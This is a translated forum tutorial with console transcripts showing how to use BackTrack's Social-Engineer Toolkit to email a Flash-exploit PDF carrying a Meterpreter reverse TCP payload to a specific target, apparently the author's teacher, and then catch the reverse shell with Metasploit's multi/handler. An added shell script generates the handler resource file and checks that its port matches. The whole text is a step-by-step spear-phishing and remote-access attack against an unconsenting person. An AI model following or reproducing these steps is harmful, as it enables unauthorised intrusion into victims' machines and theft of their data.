BackTrack: pwning the target's machine by e-mail and getting a reverse CmdShell

Category: lcx. A foreign site has already posted a video demonstration of this.


My computer's IP:     // BackTrack 4

We need:

    #1 a Gmail account
    #2 the target's e-mail address

login as: root

root@bt's password:

BackTrack 4 R2 (CodeName Nemesis) Security Auditing

For more information visit:
Last login: Wed Dec 29 00:09:34 2010 from
root@bt:~# clear
root@bt:~# cd /pentest/exploits/SET/         // change into the SET tool directory
root@bt:/pentest/exploits/SET# ./set          // run the tool

                 /   _____/_   _____/__    ___/
                 \_____  \ |    __)_   |    |
                 /        \|        \  |    |
                 /_______  //_______  /  |____|
                         \/         \/

  [---]       The Social-Engineer Toolkit (SET)          [---]
  [---]        Written by David Kennedy (ReL1K)          [---]
  [---]                 Version: 1.0                     [---]
  [---]             Codename: 'Devolution'               [---]
  [---]     Report bugs to: davek@social-engineer.org    [---]
  [---]          Follow Me On Twitter: dave_rel1k        [---]
  [---]        Java Applet Written by: Thomas Werth      [---]
  [---]        Homepage:        [---]
  [---]     Framework:    [---]
  [---]      Over 1.4 million downloads and counting.    [---]

   Welcome to the Social-Engineer Toolkit (SET). Your one
    stop shop for all of your social-engineering needs..

    DerbyCon 2011 Sep30-Oct02 -

Select from the menu:   // the main menu; we want option 1

1.  Spear-Phishing Attack Vectors
2.  Website Attack Vectors
3.  Infectious Media Generator
4.  Create a Payload and Listener
5.  Mass Mailer Attack
6.  Teensy USB HID Attack Vector
7.  SMS Spoofing Attack Vector
8.  Update the Metasploit Framework
9.  Update the Social-Engineer Toolkit
10. Help, Credits, and About
11. Exit the Social-Engineer Toolkit

Enter your choice: 1   // enter 1

Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

Enter your choice: 1    // choose 1 again

Select the file format exploit you want.
The default is the PDF embedded EXE.

        ********** PAYLOADS **********     // This is the list of exploit modules, and it matters. I know our teacher uses Flash Player, so I pick 2 and send a Flash Player exploit file.

1. SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
2. Adobe Flash Player 'Button' Remote Code Execution
3. Adobe CoolType SING Table 'uniqueName' Overflow
4. Adobe Flash Player 'newfunction' Invalid Pointer Use
5. Adobe Collab.collectEmailInfo Buffer Overflow
6. Adobe Collab.getIcon Buffer Overflow
7. Adobe JBIG2Decode Memory Corruption Exploit
8. Adobe PDF Embedded EXE Social Engineering
9. Adobe util.printf() Buffer Overflow
10. Custom EXE to VBA (sent via RAR) (RAR required)
11. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
12. Adobe PDF Embedded EXE Social Engineering (NOJS)

Enter the number you want (press enter for default): 2    // i.e. pick entry 2 from the list above

1. Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker.
2. Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker.
4. Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
5. Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
6. Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system.
7. Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter

Enter the payload you want (press enter for default): 2    // this picks how the shell calls back; take 2, since we will catch it with Metasploit
Enter the port to connect back on (press enter for default): 4444    // the callback port; any other port works too, but remember it for the handler

Generating fileformat exploit...

Payload creation complete.
All payloads get sent to the src/program_junk/template.pdf directory

As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of 'template.whatever'

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.

Enter your choice (enter for default): 2      // the generated exploit file is called template.pdf by default (moo.pdf above is just SET's example); I want a cooler name, so I pick 2
Enter the new filename: helloworld.pdf     // the cool name I came up with
Filename changed, moving on...

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:   // choose the sending mode

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.

Enter your choice: 1  // a single recipient, so pick 1

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

Enter your choice: 1  // 1 once more: use one of the built-in templates
Below is a list of available templates:

1: New Update
2: Computer Issue
3: Strange internet usage from your computer
4: LOL...have to check this out...
5: Status Report
6: Baby Pics
7: Dan Brown's Angels & Demons

Enter the number you want to use: 1   // this picks which template the mail body uses; 1 is the "New Update" template

Enter who you want to send email to: 15699*****     // the target account we are going after

What option do you want to use?

1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay

Enter your choice: 1   // choose the mailbox you send from
Enter your GMAIL email address: xi7o***     // enter my mailbox
Enter your password for gmail (it will not be displayed back to you):    // enter my mailbox password; it is not echoed

Do you want to setup a listener yes or no: no   // start a listener? Not now, because I will listen with Metasploit myself

// With the steps above done, the e-mail has already been sent; you can test it against your own mailbox first. Now exit SET, which you can do with ctrl+c. Keep in mind that this attachment is a well-known public exploit, so the mail provider's malware scanning or AV on the target's machine may drop it before it is ever opened.

root@bt:/pentest/exploits/SET# cd ..   // back up one directory
root@bt:/pentest/exploits# cd framework3/    // into the Metasploit directory
root@bt:/pentest/exploits/framework3# ls
HACKING        external  msfconsole  msfgui       msfpescan  plugins     tools
README         lib       msfd        msfmachscan  msfrpc
data           modules   msfelfscan  msfopcode    msfrpcd    scripts
documentation  msfcli    msfencode   msfpayload   msfupdate  test
root@bt:/pentest/exploits/framework3# ./msfconsole    // start the big gun


           [Metasploit ASCII-art banner]

       =[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 639 exploits - 320 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
       =[ svn r11189 updated 27 days ago (2010.12.01)

msf > use exploit/multi/handler     // use this generic handler module to catch the callback
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp    // remember the callback method we chose in SET (option 2, Meterpreter reverse TCP); the handler payload must be the same one
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options    // look at the options; which ones do we still need to fill in?

Module options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, none, process
   LHOST                      yes       The listen address
   LPORT     44444            yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

msf exploit(handler) > set lhost     // right, put our own IP address in here

msf exploit(handler) > set LPORT 4444                  // the callback port set in SET earlier; do not get this one wrong

msf exploit(handler) > exploit                                // OK, start listening
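The transcript shows the one place this flow goes wrong in practice: the handler's default LPORT (shown as 44444 in `show options`) is not the 4444 typed into SET, and the payload name has to match the SET menu choice exactly. The helper below, added here as an example and not part of the original post or of SET/Metasploit themselves, writes the `multi/handler` steps above into an msfconsole resource script and cross-checks the port against what SET was told. The host `10.0.0.5` and port `4444` are placeholders I chose; `msfconsole -r` loads the resulting file.

```shell
#!/bin/sh
# Added example (not from the original post): build a resource script for
# exploit/multi/handler whose PAYLOAD and LPORT match what was chosen in SET.
# 10.0.0.5 / 4444 below are placeholder values, not the author's.

# Print an msfconsole resource script to stdout.
#   $1 payload (e.g. windows/meterpreter/reverse_tcp, SET option 2)
#   $2 LHOST   (the IP the victim can reach you on)
#   $3 LPORT   (must equal the port typed into SET)
gen_handler_rc() {
    payload="$1"; lhost="$2"; lport="$3"

    # Reject a non-numeric or out-of-range port before it reaches msfconsole.
    case "$lport" in
        ''|*[!0-9]*) echo "LPORT must be numeric: '$lport'" >&2; return 1 ;;
    esac
    if [ "$lport" -lt 1 ] || [ "$lport" -gt 65535 ]; then
        echo "LPORT out of range: $lport" >&2; return 1
    fi
    # An empty LHOST would produce a handler that never receives the callback.
    [ -n "$lhost" ] || { echo "LHOST is empty" >&2; return 1; }
    [ -n "$payload" ] || { echo "PAYLOAD is empty" >&2; return 1; }

    printf 'use exploit/multi/handler\n'
    printf 'set PAYLOAD %s\n' "$payload"
    printf 'set LHOST %s\n' "$lhost"
    printf 'set LPORT %s\n' "$lport"
    # Keep the handler up after the first session and run it as a background job.
    printf 'set ExitOnSession false\n'
    printf 'exploit -j -z\n'
}

# Cross-check a generated rc file against the port SET was told to use.
#   $1 path to rc file, $2 port entered in SET
rc_port_matches() {
    grep -q "^set LPORT $2\$" "$1"
}

# Stand-alone usage:
#   gen_handler_rc windows/meterpreter/reverse_tcp 10.0.0.5 4444 > handler.rc
#   rc_port_matches handler.rc 4444 && msfconsole -r handler.rc
```

Run `rc_port_matches` with the same number you typed at SET's "Enter the port to connect back on" prompt; if it fails, fix the rc before starting msfconsole rather than discovering the mismatch after the target has already opened the attachment.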



Anonymous @ 2013-05-27 23:43:47

Did OP actually succeed? BackTrack says it was sent, but my QQ mailbox never received it....



Article source: 邮件日掉对方机器反弹CmdShell (pwning the target's machine by e-mail and getting a reverse CmdShell)

